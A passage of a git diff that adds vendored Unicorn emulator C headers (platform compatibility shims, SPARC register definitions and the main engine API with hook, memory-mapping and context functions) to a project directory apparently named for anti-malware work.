+*/ +#ifndef UNICORN_PLATFORM_H +#define UNICORN_PLATFORM_H + +/* +These are the various MSVC versions as given by _MSC_VER: +MSVC++ 14.0 _MSC_VER == 1900 (Visual Studio 2015) +MSVC++ 12.0 _MSC_VER == 1800 (Visual Studio 2013) +MSVC++ 11.0 _MSC_VER == 1700 (Visual Studio 2012) +MSVC++ 10.0 _MSC_VER == 1600 (Visual Studio 2010) +MSVC++ 9.0 _MSC_VER == 1500 (Visual Studio 2008) +MSVC++ 8.0 _MSC_VER == 1400 (Visual Studio 2005) +MSVC++ 7.1 _MSC_VER == 1310 (Visual Studio 2003) +MSVC++ 7.0 _MSC_VER == 1300 +MSVC++ 6.0 _MSC_VER == 1200 +MSVC++ 5.0 _MSC_VER == 1100 +*/ +#define MSC_VER_VS2003 1310 +#define MSC_VER_VS2005 1400 +#define MSC_VER_VS2008 1500 +#define MSC_VER_VS2010 1600 +#define MSC_VER_VS2012 1700 +#define MSC_VER_VS2013 1800 +#define MSC_VER_VS2015 1900 + +// handle stdbool.h compatibility +#if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) +// MSVC + +// stdbool.h +#if (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) +// this system does not have stdbool.h +#ifndef __cplusplus +typedef unsigned char bool; +#define false 0 +#define true 1 +#endif // __cplusplus + +#else +// VisualStudio 2013+ -> C99 is supported +#include <stdbool.h> +#endif // (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) + +#else +// not MSVC -> C99 is supported +#include <stdbool.h> +#endif // !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) + +#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE) +// this system does not have stdint.h +typedef signed char int8_t; +typedef signed short int16_t; +typedef signed int int32_t; +typedef unsigned char uint8_t; +typedef unsigned short uint16_t; +typedef unsigned int uint32_t; +typedef signed long long int64_t; +typedef unsigned long long uint64_t; + +#ifndef _INTPTR_T_DEFINED + #define _INTPTR_T_DEFINED + 
#ifdef _WIN64 +typedef long long intptr_t; + #else /* _WIN64 */ +typedef _W64 int intptr_t; + #endif /* _WIN64 */ +#endif /* _INTPTR_T_DEFINED */ + +#ifndef _UINTPTR_T_DEFINED + #define _UINTPTR_T_DEFINED + #ifdef _WIN64 +typedef unsigned long long uintptr_t; + #else /* _WIN64 */ +typedef _W64 unsigned int uintptr_t; + #endif /* _WIN64 */ +#endif /* _UINTPTR_T_DEFINED */ + +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN (-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 +#else // this system has stdint.h +#include <stdint.h> +#endif // (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE) + +// handle inttypes.h compatibility +#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013)) || defined(_KERNEL_MODE) +// this system does not have inttypes.h + +#define __PRI_8_LENGTH_MODIFIER__ "hh" +#define __PRI_64_LENGTH_MODIFIER__ "ll" + +#define PRId8 __PRI_8_LENGTH_MODIFIER__ "d" +#define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i" +#define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o" +#define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u" +#define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x" +#define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X" + +#define PRId16 "hd" +#define PRIi16 "hi" +#define PRIo16 "ho" +#define PRIu16 "hu" +#define PRIx16 "hx" +#define PRIX16 "hX" + +#if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) +#define PRId32 "ld" +#define PRIi32 "li" +#define PRIo32 "lo" +#define PRIu32 "lu" +#define PRIx32 "lx" +#define PRIX32 "lX" +#else // OSX +#define PRId32 "d" +#define PRIi32 "i" +#define PRIo32 "o" +#define PRIu32 "u" +#define PRIx32 "x" +#define PRIX32 "X" +#endif // defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) + +#if defined(_MSC_VER) && (_MSC_VER <= 
MSC_VER_VS2012) +// redefine functions from inttypes.h used in cstool +#define strtoull _strtoui64 +#endif + +#define PRId64 __PRI_64_LENGTH_MODIFIER__ "d" +#define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i" +#define PRIo64 __PRI_64_LENGTH_MODIFIER__ "o" +#define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u" +#define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x" +#define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X" + +#else +// this system has inttypes.h by default +#include <inttypes.h> +#endif // #if defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) + +// sys/time.h compatibility +#if defined(_MSC_VER) +#include <sys/timeb.h> +#include <winsock2.h> +#include <windows.h> + +static int gettimeofday(struct timeval* t, void* timezone) +{ + struct _timeb timebuffer; + _ftime( &timebuffer ); + t->tv_sec = (long)timebuffer.time; + t->tv_usec = 1000*timebuffer.millitm; + return 0; +} +#else +#include <sys/time.h> +#endif + +// unistd.h compatibility +#if defined(_MSC_VER) + +static int usleep(uint32_t usec) +{ + HANDLE timer; + LARGE_INTEGER due; + + timer = CreateWaitableTimer(NULL, TRUE, NULL); + if (!timer) + return -1; + + due.QuadPart = (-((int64_t) usec)) * 10LL; + if (!SetWaitableTimer(timer, &due, 0, NULL, NULL, 0)) { + CloseHandle(timer); + return -1; + } + WaitForSingleObject(timer, INFINITE); + CloseHandle(timer); + + return 0; +} + +#else +#include <unistd.h> +#endif + +// misc support +#if defined(_MSC_VER) +#ifdef _WIN64 +typedef signed __int64 ssize_t; +#else +typedef _W64 signed int ssize_t; +#endif + +#ifndef va_copy +#define va_copy(d,s) ((d) = (s)) +#endif +#define strcasecmp _stricmp +#if (_MSC_VER < MSC_VER_VS2015) +#define snprintf _snprintf +#endif +#if (_MSC_VER <= MSC_VER_VS2013) +#define strtoll _strtoi64 +#endif +#endif + + +#endif // UNICORN_PLATFORM_H diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/sparc.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/sparc.h new file mode 100644 index 0000000..08e0538 --- /dev/null 
+++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/sparc.h @@ -0,0 +1,130 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2014-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_SPARC_H +#define UNICORN_SPARC_H + +#ifdef __cplusplus +extern "C" { +#endif + +// GCC SPARC toolchain has a default macro called "sparc" which breaks +// compilation +#undef sparc + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> SPARC registers +typedef enum uc_sparc_reg { + UC_SPARC_REG_INVALID = 0, + + UC_SPARC_REG_F0, + UC_SPARC_REG_F1, + UC_SPARC_REG_F2, + UC_SPARC_REG_F3, + UC_SPARC_REG_F4, + UC_SPARC_REG_F5, + UC_SPARC_REG_F6, + UC_SPARC_REG_F7, + UC_SPARC_REG_F8, + UC_SPARC_REG_F9, + UC_SPARC_REG_F10, + UC_SPARC_REG_F11, + UC_SPARC_REG_F12, + UC_SPARC_REG_F13, + UC_SPARC_REG_F14, + UC_SPARC_REG_F15, + UC_SPARC_REG_F16, + UC_SPARC_REG_F17, + UC_SPARC_REG_F18, + UC_SPARC_REG_F19, + UC_SPARC_REG_F20, + UC_SPARC_REG_F21, + UC_SPARC_REG_F22, + UC_SPARC_REG_F23, + UC_SPARC_REG_F24, + UC_SPARC_REG_F25, + UC_SPARC_REG_F26, + UC_SPARC_REG_F27, + UC_SPARC_REG_F28, + UC_SPARC_REG_F29, + UC_SPARC_REG_F30, + UC_SPARC_REG_F31, + UC_SPARC_REG_F32, + UC_SPARC_REG_F34, + UC_SPARC_REG_F36, + UC_SPARC_REG_F38, + UC_SPARC_REG_F40, + UC_SPARC_REG_F42, + UC_SPARC_REG_F44, + UC_SPARC_REG_F46, + UC_SPARC_REG_F48, + UC_SPARC_REG_F50, + UC_SPARC_REG_F52, + UC_SPARC_REG_F54, + UC_SPARC_REG_F56, + UC_SPARC_REG_F58, + UC_SPARC_REG_F60, + UC_SPARC_REG_F62, + UC_SPARC_REG_FCC0, // Floating condition codes + UC_SPARC_REG_FCC1, + UC_SPARC_REG_FCC2, + UC_SPARC_REG_FCC3, + UC_SPARC_REG_G0, + UC_SPARC_REG_G1, + UC_SPARC_REG_G2, + UC_SPARC_REG_G3, + UC_SPARC_REG_G4, + UC_SPARC_REG_G5, + UC_SPARC_REG_G6, + UC_SPARC_REG_G7, + UC_SPARC_REG_I0, + UC_SPARC_REG_I1, + UC_SPARC_REG_I2, + UC_SPARC_REG_I3, + UC_SPARC_REG_I4, + UC_SPARC_REG_I5, + UC_SPARC_REG_FP, + UC_SPARC_REG_I7, + UC_SPARC_REG_ICC, 
// Integer condition codes + UC_SPARC_REG_L0, + UC_SPARC_REG_L1, + UC_SPARC_REG_L2, + UC_SPARC_REG_L3, + UC_SPARC_REG_L4, + UC_SPARC_REG_L5, + UC_SPARC_REG_L6, + UC_SPARC_REG_L7, + UC_SPARC_REG_O0, + UC_SPARC_REG_O1, + UC_SPARC_REG_O2, + UC_SPARC_REG_O3, + UC_SPARC_REG_O4, + UC_SPARC_REG_O5, + UC_SPARC_REG_SP, + UC_SPARC_REG_O7, + UC_SPARC_REG_Y, + + // special register + UC_SPARC_REG_XCC, + + // pseudo register + UC_SPARC_REG_PC, // program counter register + + UC_SPARC_REG_ENDING, // <-- mark the end of the list of registers + + // extras + UC_SPARC_REG_O6 = UC_SPARC_REG_SP, + UC_SPARC_REG_I6 = UC_SPARC_REG_FP, +} uc_sparc_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/unicorn.h new file mode 100644 index 0000000..c7f1703 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/unicorn.h @@ -0,0 +1,779 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. 
+ See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ENGINE_H +#define UNICORN_ENGINE_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" +#include <stdarg.h> + +#if defined(UNICORN_HAS_OSXKERNEL) +#include <libkern/libkern.h> +#else +#include <stdlib.h> +#include <stdio.h> +#endif + +struct uc_struct; +typedef struct uc_struct uc_engine; + +typedef size_t uc_hook; + +#include "m68k.h" +#include "x86.h" +#include "arm.h" +#include "arm64.h" +#include "mips.h" +#include "sparc.h" + +#ifdef __GNUC__ +#define DEFAULT_VISIBILITY __attribute__((visibility("default"))) +#else +#define DEFAULT_VISIBILITY +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#pragma warning(disable:4100) +#ifdef UNICORN_SHARED +#define UNICORN_EXPORT __declspec(dllexport) +#else // defined(UNICORN_STATIC) +#define UNICORN_EXPORT +#endif +#else +#ifdef __GNUC__ +#define UNICORN_EXPORT __attribute__((visibility("default"))) +#else +#define UNICORN_EXPORT +#endif +#endif + +#ifdef __GNUC__ +#define UNICORN_DEPRECATED __attribute__((deprecated)) +#elif defined(_MSC_VER) +#define UNICORN_DEPRECATED __declspec(deprecated) +#else +#pragma message("WARNING: You need to implement UNICORN_DEPRECATED for this compiler") +#define UNICORN_DEPRECATED +#endif + +// Unicorn API version +#define UC_API_MAJOR 1 +#define UC_API_MINOR 0 + +// Unicorn package version +#define UC_VERSION_MAJOR UC_API_MAJOR +#define UC_VERSION_MINOR UC_API_MINOR +#define UC_VERSION_EXTRA 2 + + +/* + Macro to create combined version which can be compared to + result of uc_version() API. 
// 1 millisecond = 1000 microseconds
UC_ERR_ARG, // Invalid argument provided to uc_xxx function (See specific function API)
+*/ +typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); + +/* + Callback function for tracing interrupts (for uc_hook_intr()) + + @intno: interrupt number + @user_data: user data passed to tracing APIs. +*/ +typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data); + +/* + Callback function for tracing invalid instructions + + @user_data: user data passed to tracing APIs. + + @return: return true to continue, or false to stop program (due to invalid instruction). +*/ +typedef bool (*uc_cb_hookinsn_invalid_t)(uc_engine *uc, void *user_data); + +/* + Callback function for tracing IN instruction of X86 + + @port: port number + @size: data size (1/2/4) to be read from this port + @user_data: user data passed to tracing APIs. +*/ +typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); + +/* + Callback function for OUT instruction of X86 + + @port: port number + @size: data size (1/2/4) to be written to this port + @value: data value to be written to this port +*/ +typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); + +// All type of memory accesses for UC_HOOK_MEM_* +typedef enum uc_mem_type { + UC_MEM_READ = 16, // Memory is read from + UC_MEM_WRITE, // Memory is written to + UC_MEM_FETCH, // Memory is fetched + UC_MEM_READ_UNMAPPED, // Unmapped memory is read from + UC_MEM_WRITE_UNMAPPED, // Unmapped memory is written to + UC_MEM_FETCH_UNMAPPED, // Unmapped memory is fetched + UC_MEM_WRITE_PROT, // Write to write protected, but mapped, memory + UC_MEM_READ_PROT, // Read from read protected, but mapped, memory + UC_MEM_FETCH_PROT, // Fetch from non-executable, but mapped, memory + UC_MEM_READ_AFTER, // Memory is read from (successful access) +} uc_mem_type; + +// All type of hooks for uc_hook_add() API. 
+typedef enum uc_hook_type { + // Hook all interrupt/syscall events + UC_HOOK_INTR = 1 << 0, + // Hook a particular instruction - only a very small subset of instructions supported here + UC_HOOK_INSN = 1 << 1, + // Hook a range of code + UC_HOOK_CODE = 1 << 2, + // Hook basic blocks + UC_HOOK_BLOCK = 1 << 3, + // Hook for memory read on unmapped memory + UC_HOOK_MEM_READ_UNMAPPED = 1 << 4, + // Hook for invalid memory write events + UC_HOOK_MEM_WRITE_UNMAPPED = 1 << 5, + // Hook for invalid memory fetch for execution events + UC_HOOK_MEM_FETCH_UNMAPPED = 1 << 6, + // Hook for memory read on read-protected memory + UC_HOOK_MEM_READ_PROT = 1 << 7, + // Hook for memory write on write-protected memory + UC_HOOK_MEM_WRITE_PROT = 1 << 8, + // Hook for memory fetch on non-executable memory + UC_HOOK_MEM_FETCH_PROT = 1 << 9, + // Hook memory read events. + UC_HOOK_MEM_READ = 1 << 10, + // Hook memory write events. + UC_HOOK_MEM_WRITE = 1 << 11, + // Hook memory fetch for execution events + UC_HOOK_MEM_FETCH = 1 << 12, + // Hook memory read events, but only successful access. + // The callback will be triggered after successful read. + UC_HOOK_MEM_READ_AFTER = 1 << 13, + // Hook invalid instructions exceptions. 
+ UC_HOOK_INSN_INVALID = 1 << 14, +} uc_hook_type; + +// Hook type for all events of unmapped memory access +#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook type for all events of illegal protected memory access +#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) +// Hook type for all events of illegal read memory access +#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) +// Hook type for all events of illegal write memory access +#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) +// Hook type for all events of illegal fetch memory access +#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook type for all events of illegal memory access +#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) +// Hook type for all events of valid memory access +// NOTE: UC_HOOK_MEM_READ is triggered before UC_HOOK_MEM_READ_PROT and UC_HOOK_MEM_READ_UNMAPPED, so +// this hook may technically trigger on some invalid reads. +#define UC_HOOK_MEM_VALID (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) + +/* + Callback function for hooking memory (READ, WRITE & FETCH) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. 
+ @user_data: user data passed to tracing APIs +*/ +typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data); + +/* + Callback function for handling invalid memory access events (UNMAPPED and + PROT events) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs + + @return: return true to continue, or false to stop program (due to invalid memory). + NOTE: returning true to continue execution will only work if the accessed + memory is made accessible with the correct permissions during the hook. + + In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback, + the memory should be uc_mem_map()-ed with the correct permissions, and the + instruction will then read or write to the address as it was supposed to. + + In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped + in as executable, in which case execution will resume from the fetched address. + The instruction pointer may be written to in order to change where execution resumes, + but the fetch must succeed if execution is to resume. +*/ +typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data); + +/* + Memory region mapped by uc_mem_map() and uc_mem_map_ptr() + Retrieve the list of memory regions with uc_mem_regions() +*/ +typedef struct uc_mem_region { + uint64_t begin; // begin address of the region (inclusive) + uint64_t end; // end address of the region (inclusive) + uint32_t perms; // memory permissions of the region +} uc_mem_region; + +// All type of queries for uc_query() API. +typedef enum uc_query_type { + // Dynamically query current hardware mode. 
+ UC_QUERY_MODE = 1, + UC_QUERY_PAGE_SIZE, // query pagesize of engine + UC_QUERY_ARCH, // query architecture of engine (for ARM to query Thumb mode) + UC_QUERY_TIMEOUT, // query if emulation stops due to timeout (indicated if result = True) +} uc_query_type; + +// Opaque storage for CPU context, used with uc_context_*() +struct uc_context; +typedef struct uc_context uc_context; + +/* + Return combined API version & major and minor version numbers. + + @major: major number of API version + @minor: minor number of API version + + @return hexical number as (major << 8 | minor), which encodes both + major & minor versions. + NOTE: This returned value can be compared with version number made + with macro UC_MAKE_VERSION + + For example, second API version would return 1 in @major, and 1 in @minor + The return value would be 0x0101 + + NOTE: if you only care about returned value, but not major and minor values, + set both @major & @minor arguments to NULL. +*/ +UNICORN_EXPORT +unsigned int uc_version(unsigned int *major, unsigned int *minor); + + +/* + Determine if the given architecture is supported by this library. + + @arch: architecture type (UC_ARCH_*) + + @return True if this library supports the given arch. +*/ +UNICORN_EXPORT +bool uc_arch_supported(uc_arch arch); + + +/* + Create new instance of unicorn engine. + + @arch: architecture type (UC_ARCH_*) + @mode: hardware mode. This is combined of UC_MODE_* + @uc: pointer to uc_engine, which will be updated at return time + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); + +/* + Close a Unicorn engine instance. + NOTE: this must be called only when there is no longer any + usage of @uc. This API releases some of @uc's cached memory, thus + any use of the Unicorn API with @uc after it has been closed may + crash your application. 
After this, @uc is invalid, and is no + longer usable. + + @uc: pointer to a handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_close(uc_engine *uc); + +/* + Query internal status of engine. + + @uc: handle returned by uc_open() + @type: query type. See uc_query_type + + @result: save the internal status queried + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*/ +UNICORN_EXPORT +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); + +/* + Report the last error number when some API function fails. + Like glibc's errno, uc_errno might not retain its old value once accessed. + + @uc: handle returned by uc_open() + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*/ +UNICORN_EXPORT +uc_err uc_errno(uc_engine *uc); + +/* + Return a string describing given error code. + + @code: error code (see UC_ERR_* above) + + @return: returns a pointer to a string that describes the error code + passed in the argument @code + */ +UNICORN_EXPORT +const char *uc_strerror(uc_err code); + +/* + Write to register. + + @uc: handle returned by uc_open() + @regid: register ID that is to be modified. + @value: pointer to the value that will set to register @regid + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_write(uc_engine *uc, int regid, const void *value); + +/* + Read register value. + + @uc: handle returned by uc_open() + @regid: register ID that is to be retrieved. + @value: pointer to a variable storing the register value. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_read(uc_engine *uc, int regid, void *value); + +/* + Write multiple register values. 
@regs: array of register IDs to store
when this address is hit) + @timeout: duration to emulate the code (in microseconds). When this value is 0, + we will emulate the code in infinite time, until the code is finished. + @count: the number of instructions to be emulated. When this value is 0, + we will emulate all the code available, until the code is finished. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); + +/* + Stop emulation (which was started by uc_emu_start() API. + This is typically called from callback functions registered via tracing APIs. + + @uc: handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_emu_stop(uc_engine *uc); + +/* + Register callback for a hook event. + The callback will be run when the hook event is hit. + + @uc: handle returned by uc_open() + @hh: hook handle returned from this registration. To be used in uc_hook_del() API + @type: hook type, refer to uc_hook_type enum + @callback: callback to be run when instruction is hit + @user_data: user-defined data. This will be passed to callback function in its + last argument @user_data + @begin: start address of the area where the callback is in effect (inclusive) + @end: end address of the area where the callback is in effect (inclusive) + NOTE 1: the callback is called only if related address is in range [@begin, @end] + NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered + @...: variable arguments (depending on @type) + NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT) + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). 
+*/ +UNICORN_EXPORT +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...); + +/* + Unregister (remove) a hook callback. + This API removes the hook callback registered by uc_hook_add(). + NOTE: this should be called only when you no longer want to trace. + After this, @hh is invalid, and no longer usable. + + @uc: handle returned by uc_open() + @hh: handle returned by uc_hook_add() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_hook_del(uc_engine *uc, uc_hook hh); + +typedef enum uc_prot { + UC_PROT_NONE = 0, + UC_PROT_READ = 1, + UC_PROT_WRITE = 2, + UC_PROT_EXEC = 4, + UC_PROT_ALL = 7, +} uc_prot; + +/* + Map memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); + +/* + Map existing host memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. 
+ This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + @ptr: pointer to host memory backing the newly mapped memory. This host memory is + expected to be of equal or larger size than provided, and be mapped with at + least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); + +/* + Unmap a region of emulation memory. + This API deletes a memory mapping from the emulation memory space. + + @uc: handle returned by uc_open() + @address: starting address of the memory region to be unmapped. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); + +/* + Set memory permissions for emulation memory. + This API changes permissions on an existing memory region. + + @uc: handle returned by uc_open() + @address: starting address of the memory region to be modified. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: New permissions for the mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. 
+ + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); + +/* + Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() + This API allocates memory for @regions, and user must free this memory later + by uc_free() to avoid leaking memory. + NOTE: memory regions may be split by uc_mem_unmap() + + @uc: handle returned by uc_open() + @regions: pointer to an array of uc_mem_region struct. This is allocated by + Unicorn, and must be freed by user later with uc_free() + @count: pointer to number of struct uc_mem_region contained in @regions + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count); + +/* + Allocate a region that can be used with uc_context_{save,restore} to perform + quick save/rollback of the CPU context, which includes registers and some + internal metadata. Contexts may not be shared across engine instances with + differing arches or modes. + + @uc: handle returned by uc_open() + @context: pointer to a uc_context*. This will be updated with the pointer to + the new context on successful return of this function. + Later, this allocated memory must be freed with uc_context_free(). + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_alloc(uc_engine *uc, uc_context **context); + +/* + Free the memory allocated by uc_mem_regions. + WARNING: After Unicorn 1.0.1rc5, the memory allocated by uc_context_alloc should + be freed by uc_context_free(). Calling uc_free() may still work, but the result + is **undefined**. + + @mem: memory allocated by uc_mem_regions (returned in *regions). 
+
+ @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+ for detailed error).
+*/
+UNICORN_EXPORT
+uc_err uc_free(void *mem);
+
+/*
+ Save a copy of the internal CPU context.
+ This API should be used to efficiently make or update a saved copy of the
+ internal CPU state.
+
+ @uc: handle returned by uc_open()
+ @context: handle returned by uc_context_alloc()
+
+ @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+ for detailed error).
+*/
+UNICORN_EXPORT
+uc_err uc_context_save(uc_engine *uc, uc_context *context);
+
+/*
+ Restore the current CPU context from a saved copy.
+ This API should be used to roll the CPU context back to a previous
+ state saved by uc_context_save().
+
+ @uc: handle returned by uc_open()
+ @context: handle returned by uc_context_alloc that has been used with uc_context_save
+
+ @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+ for detailed error).
+*/
+UNICORN_EXPORT
+uc_err uc_context_restore(uc_engine *uc, uc_context *context);
+
+
+/*
+ Return the size needed to store the cpu context. Can be used to allocate a buffer
+ to contain the cpu context and directly call uc_context_save.
+
+ @uc: handle returned by uc_open()
+
+ @return the size needed to store the cpu context, as a size_t.
+*/
+UNICORN_EXPORT
+size_t uc_context_size(uc_engine *uc);
+
+
+/*
+ Free the context allocated by uc_context_alloc().
+
+ @context: handle returned by uc_context_alloc()
+
+ @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+ for detailed error).
